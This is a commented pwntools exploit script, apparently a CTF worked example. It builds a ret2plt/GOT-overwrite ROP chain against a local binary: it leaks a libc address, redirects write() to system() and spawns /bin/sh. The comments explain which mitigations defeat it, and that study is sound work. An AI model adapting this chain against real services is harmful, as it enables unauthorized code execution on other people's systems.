- # Flat pwntools script: a ret2plt / GOT-overwrite ROP chain against a CTF-style
- # binary ("./leak") served on localhost:5000.  Kept here as a worked example of
- # the attack class, not as reusable tooling: every address below is hard-coded
- # for that one non-PIE binary and the author's distro libc.
- # NOTE(review): str and p64() output are concatenated directly, so this is
- # Python 2-era pwntools; it does not express the payload as bytes.
- # Defensive reading: the chain depends on (a) a writable GOT — Full RELRO
- # (-Wl,-z,relro,-z,now) makes the entry at e.got['write'] read-only, (b) fixed
- # code/data addresses — PIE randomises 0x40068a and 0x601048, and (c) a stack
- # overflow large enough to reach the return address — a stack protector would
- # abort before the chain runs.  Any one of these mitigations breaks it.
- from pwn import *
- # Local binary and the host libc; used only for symbol/GOT/PLT lookups below.
- e = ELF("./leak")
- l = ELF("/lib/x86_64-linux-gnu/libc.so.6")
- # Hard-coded gadget address in ./leak.  From the three values pushed after each
- # use it appears to be a pop;pop;pop;ret sequence (hence the name) — confirm
- # against the binary, it is not derived from the ELF object.
- pppr = 0x000000000040068a
- s = remote('127.0.0.1', 5000)
- s.recvuntil(": ")
- # 168 bytes of filler; presumably the distance from the overflowed buffer to
- # the saved return address (not derivable from this script).
- payload = "A"*168
- # Stage 1: write(STDOUT, &GOT[write], 8) — echoes the resolved libc address of
- # write() back over the socket.  This is the info leak the script is named for.
- payload += p64(pppr)
- payload += p64(constants.STDOUT_FILENO)
- payload += p64(e.got['write'])
- payload += p64(0x8)
- payload += p64(e.plt['write'])
- # Stage 2: read(STDIN, &GOT[write], 8) — the next 8 bytes the client sends
- # replace write()'s GOT entry (see the s.send(p64(...)) call near the end).
- payload += p64(pppr)
- payload += p64(constants.STDIN_FILENO)
- payload += p64(e.got['write'])
- payload += p64(0x8)
- payload += p64(e.plt['read'])
- # Stage 3: read(STDIN, 0x601048, 7) — 7 bytes from the client land at a fixed
- # writable address in the binary (the "/bin/sh" sent later).
- payload += p64(pppr)
- payload += p64(constants.STDIN_FILENO)
- payload += p64(0x601048)
- payload += p64(0x7)
- payload += p64(e.plt['read'])
- # Stage 4: call write@plt with rdi = 0x601048.  Because stage 2 rewrote the
- # GOT slot, the PLT stub now jumps to whatever address was supplied, with the
- # stage-3 buffer as its first argument.  "JUNK"*4 fills the two remaining pop
- # slots of the gadget (16 bytes) whose values do not matter here.
- payload += p64(pppr)
- payload += p64(0x601048)
- payload += ("JUNK"*4)
- payload += p64(e.plt['write'])
- # Trailing marker; the recvuntil("gg\n") below waits for it, which implies the
- # service echoes (part of) the input before the leak — not verifiable here.
- payload += "gg"
- s.sendline(payload)
- s.recvuntil("gg\n")
- # Consume the 8 leaked bytes from stage 1 and rebase libc from write()'s
- # known offset in the local libc object.
- got_leak = u64(s.recv(8))
- libc_base = got_leak - l.symbols['write']
- # Feeds stage 2 (new GOT[write] value) and stage 3 (7-byte string).
- s.send(p64(libc_base + l.symbols['system']))
- s.send("/bin/sh")
- s.interactive()